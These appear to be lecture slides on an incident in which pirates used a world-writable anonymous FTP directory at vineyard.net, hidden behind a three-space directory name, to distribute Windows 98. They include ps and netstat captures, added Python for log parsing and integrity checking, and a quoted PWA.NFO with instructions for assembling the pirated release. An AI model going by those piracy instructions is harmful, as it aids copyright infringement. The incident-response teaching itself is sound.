ftp 10088 0.0 0.2 288 480 ?? S 1:54PM 0:00.27 cmodem85.lancite.net: anonymous/getright@: RETR /simson/open/ /calibreX/Win98.Final-PWA/pwa98cbe.zip\r\n (ftpd)
ftp 10125 0.0 0.2 288 480 ?? S 1:54PM 0:00.28 cmodem85.lancite.net: anonymous/getright@: RETR /simson/open/ /calibreX/Win98.Final-PWA/pwa98cbd.zip\r\n (ftpd)
ftp 10251 0.0 0.2 288 480 ?? S 1:55PM 0:00.28 cmodem85.lancite.net: anonymous/getright@: RETR /simson/open/ /calibreX/Win98.Final-PWA/pwa98cbc.zip\r\n (ftpd)
Total simultaneous FTP transfers: 106
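As an added example (not from the slides), a Python parser for ftpd process titles of the form shown above; it totals the transfers, groups them by remote host and target directory, and flags paths that pass through whitespace-only directory names. The sample lines are constructed after the slide and the anonymous-FTP passwords in them are assumed.

```python
import posixpath
import re
from collections import Counter

# Matches the ftpd process titles in the slide's ps output:
#   ftp <pid> <8 ps columns> <host>: anonymous/<password>: RETR <path>\r\n (ftpd)
FTPD_RE = re.compile(
    r"^ftp\s+(?P<pid>\d+)\s+(?:\S+\s+){8}"
    r"(?P<host>[\w.\-]+):\s+anonymous/(?P<password>[^:]*):\s+"
    r"RETR\s+(?P<path>.*?)\\r\\n\s+\(ftpd\)$"
)

# Constructed sample modelled on the slide; "   " is the three-space
# directory the slides describe, and the passwords are assumed.
SAMPLE_PS = [
    "ftp 1471 0.0 0.2 740 496 ?? I 12:28PM 0:13.88 ds9.kulnet.kuleuven.ac.be: "
    "anonymous/guest@: RETR pwa98cbl.zip\\r\\n (ftpd)",
    "ftp 1750 0.0 0.2 752 504 ?? S 12:32PM 0:12.79 ds9.kulnet.kuleuven.ac.be: "
    "anonymous/guest@: RETR pwa98cbj.zip\\r\\n (ftpd)",
    "ftp 6982 0.0 0.2 288 480 ?? S 1:20PM 0:17.21 142.194.48.68: "
    "anonymous/getright@: RETR /simson/open/nothing_here/this_site_sucks/pwa98cbg.zip\\r\\n (ftpd)",
    "ftp 10062 0.0 0.2 288 480 ?? S 1:53PM 0:00.27 cmodem85.lancite.net: "
    "anonymous/getright@: RETR /simson/open/   /calibreX/Win98.Final-PWA/pwa98cbf.zip\\r\\n (ftpd)",
    "ftp 10088 0.0 0.2 288 480 ?? S 1:54PM 0:00.27 cmodem85.lancite.net: "
    "anonymous/getright@: RETR /simson/open/   /calibreX/Win98.Final-PWA/pwa98cbe.zip\\r\\n (ftpd)",
    "root 62 0.0 0.1 160 340 ?? Ss Mon01PM 1:19.11 syslogd",  # not an ftpd line, ignored
]


def hidden_components(path):
    """Directory names made only of whitespace, which a casual 'ls' does not show."""
    return [p for p in path.split("/") if p and not p.strip()]


def analyze_ftp_transfers(ps_lines, max_simultaneous=20):
    """Summarise anonymous RETR activity and flag the incident's two signs:
    a flood of simultaneous transfers and paths through hidden directories."""
    transfers = [m.groupdict() for m in map(FTPD_RE.match, ps_lines) if m]
    # a path with no leading "/" is relative to the client's current directory
    by_dir = Counter(posixpath.dirname(t["path"]) or "." for t in transfers)
    return {
        "total": len(transfers),
        "flood": len(transfers) > max_simultaneous,
        "by_host": Counter(t["host"] for t in transfers),
        "by_directory": by_dir,
        "hidden_paths": sorted({t["path"] for t in transfers if hidden_components(t["path"])}),
    }
```

On the real list of 106 transfers the "flood" flag and the per-directory counter would have pointed straight at /simson/open.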
Netstat reveals further information…
walden: {424} % more netstat-list
Active Internet connections (including servers)
Proto Recv-Q Send-Q Local Address Foreign Address (state)
tcp 0 0 VINEYARD.NET.http a2p09.capcon.net.1203 SYN_RCVD
tcp 0 0 VINEYARD.NET.http DSY4.VINEYARD.NE.1406 SYN_RCVD
tcp 0 0 VINEYARD.NET.pop ASY5.VINEYARD.NE.2117 ESTABLISHED
tcp 0 1513 VINEYARD.NET.http 207.112.204.161.1570 FIN_WAIT_1
tcp 0 8500 VINEYARD.NET.http srry01m05-128.bc.1505 ESTABLISHED
tcp 0 7168 VINEYARD.NET.http hd62-160.hil.com.2033 ESTABLISHED
tcp 0 8192 VINEYARD.NET.http 208.232.119.2.4125 ESTABLISHED
tcp 0 7552 VINEYARD.NET.20 hades.osc.epsilo.2943 ESTABLISHED
tcp 0 6952 VINEYARD.NET.http ww-tl01.proxy.ao.37672 ESTABLISHED
tcp 0 0 VINEYARD.NET.ftp dns1.bit-net.com.2268 ESTABLISHED
tcp 0 0 VINEYARD.NET.http cs206-32.student.1068 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.ftp spc-isp-mon-uas-.1037 ESTABLISHED
tcp 0 0 VINEYARD.NET.ftp kenny26.zip.com..1033 ESTABLISHED
tcp 0 0 VINEYARD.NET.http cs206-32.student.1067 FIN_WAIT_2
tcp 0 0 VINEYARD.NET.ftp sladl3p24.ozemai.1676 ESTABLISHED
tcp 0 8760 VINEYARD.NET.pop ASY10.VINEYARD.N.1043 ESTABLISHED
tcp 0 0 VINEYARD.NET.http cs206-32.student.1065 FIN_WAIT_2
tcp 0 7360 VINEYARD.NET.20 195.120.233.99.1819 ESTABLISHED
tcp 0 7340 VINEYARD.NET.1093 204.138.179.14.20 ESTABLISHED
We’ve been warezed!
ftp://vineyard.net/simson/open
– World-writable FTP directory.
Two directories were created in open:
– “   ” Three spaces
– “nothing_here”
File list
./open/ /
./open/ /calibreX/
./open/ /calibreX/Win98.Final-PWA/
./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/
./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/PWA.NFO
./open/ /calibreX/Win98.Final-PWA/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/pwa98rfl1.zip
./open/ /calibreX/Win98.Final-PWA/file_id.diz
./open/ /calibreX/Win98.Final-PWA/PWA.NFO
./open/ /calibreX/Win98.Final-PWA/pwa98cba.zip
./open/ /calibreX/Win98.Final-PWA/pwa98cbd.good.zip
./open/ /calibreX/Win98.Final-PWA/pwa98cbb.zip
./open/ /calibreX/Win98.Final-PWA/pwa98cbc.zip
./open/ /calibreX/Win98.Final-PWA/pwa98cbd.zip
./open/ /calibreX/Win98.Final-PWA/pwa98cbe.zip
. . .
./open/nothing_here/
./open/nothing_here/ /
./open/nothing_here/ /pwa98cba.zip
/Microsoft_WIndows98_FINAL_Retail_Full_Setup-PWA/
Pirates With Attitudes
– Supplier: PWA Gods
– Cracker: N/A
– Packager: Murmillius
– Protection: Serial Number
– Type: Operating System
– Disks: 21 x 5meg
PWA.NFO
Here it is: Windows '98 Final release - Retail Full Install!
While every other group will be bringing you so many good programs for this operating system, it's PWA that brings you the OS itself. It is fortunately for the user community that this is the case or you would probably have ended up with a ripped down release from some other lame group missing important system files like KRNL386.exe, because disklimits are more important nowadays to these people than a working release.
PWA.NFO … cont
You need to download the CABS and the RETAIL SETUP and unzip/unrar everything into one directory. The reason for this is that as soon as I get install keys, I can release RETAIL UPGRADE, OEM FULL and OEM UPGRADE versions and they will only take 4 meg each (the CAB zips are generic thruout all these versions, I can just package up the differences in seperate zips to save everyone space and time). You just unzip whichever one you want into the same directory as the generic CAB zips.
Question: Is PWA.NFO Hearsay?
What we did
Called Microsoft’s anti-piracy line.
– Useless
Called FBI
– Pretty useless as well.
Called Pace University
– This got results…
– …not necessarily the right results.
Integrity Management
What is it? How do you do it?
– Tripwire
– Comparison Copies
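Added example, not Tripwire's own code: a minimal Tripwire-style integrity check in Python. A baseline records the mode, size and SHA-256 of every entry under a root; a later snapshot is compared against it to report added, removed and altered entries, plus any world-writable directory, the weakness behind the incident above. The demo builds a constructed directory tree modelled on the slides (a world-writable "open" directory in which a three-space directory appears).

```python
import hashlib
import os
import stat
import tempfile


def file_digest(path, chunk=65536):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(root):
    """Baseline database keyed by path relative to root."""
    db = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            rel = os.path.relpath(full, root)
            if stat.S_ISDIR(st.st_mode):
                # directory size varies by filesystem, so only the mode is tracked
                db[rel] = {"type": "dir", "mode": stat.S_IMODE(st.st_mode)}
            elif stat.S_ISREG(st.st_mode):
                db[rel] = {"type": "file", "mode": stat.S_IMODE(st.st_mode),
                           "size": st.st_size, "sha256": file_digest(full)}
            else:
                db[rel] = {"type": "other", "mode": stat.S_IMODE(st.st_mode)}
    return db


def compare(baseline, current):
    """Report what changed between two snapshots, plus world-writable directories."""
    before, after = set(baseline), set(current)
    return {
        "added": sorted(after - before),
        "removed": sorted(before - after),
        "changed": sorted(p for p in before & after if baseline[p] != current[p]),
        "world_writable_dirs": sorted(p for p, e in current.items()
                                      if e["type"] == "dir" and e["mode"] & stat.S_IWOTH),
    }


def demo():
    """Constructed scenario: intruder activity in a world-writable 'open' directory."""
    with tempfile.TemporaryDirectory() as root:
        open_dir = os.path.join(root, "open")
        os.mkdir(open_dir)
        os.chmod(open_dir, 0o777)                      # the misconfiguration
        with open(os.path.join(open_dir, "README"), "wb") as f:
            f.write(b"constructed sample\n")
        baseline = snapshot(root)
        hidden = os.path.join(open_dir, "   ", "calibreX")  # three-space directory
        os.makedirs(hidden)
        with open(os.path.join(hidden, "file_id.diz"), "wb") as f:
            f.write(b"constructed sample\n")
        with open(os.path.join(open_dir, "README"), "ab") as f:
            f.write(b"tampered\n")
        return compare(baseline, snapshot(root))
```

A comparison-copy approach does the same job by diffing against a stored copy of the tree instead of a hash database; the hash database is much smaller but must itself be kept where an intruder cannot rewrite it.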